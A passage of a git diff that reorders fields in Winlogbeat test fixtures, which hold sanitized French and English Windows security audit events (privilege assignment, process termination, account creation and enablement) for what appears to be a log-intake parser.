Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json index 59c3d35b3..ec935a02c 100644 --- a/Beats/winlogbeat/tests/security_event_4672.json +++ b/Beats/winlogbeat/tests/security_event_4672.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json index e5beffcf5..22840d53c 100644 --- a/Beats/winlogbeat/tests/security_event_4689.json +++ b/Beats/winlogbeat/tests/security_event_4689.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json index 96e08b538..03a0543f5 100644 --- a/Beats/winlogbeat/tests/security_event_4720.json +++ b/Beats/winlogbeat/tests/security_event_4720.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + } }, "expected": { "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json index 94bd16fdf..99debf8cf 100644 --- a/Beats/winlogbeat/tests/security_event_4722.json +++ b/Beats/winlogbeat/tests/security_event_4722.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount 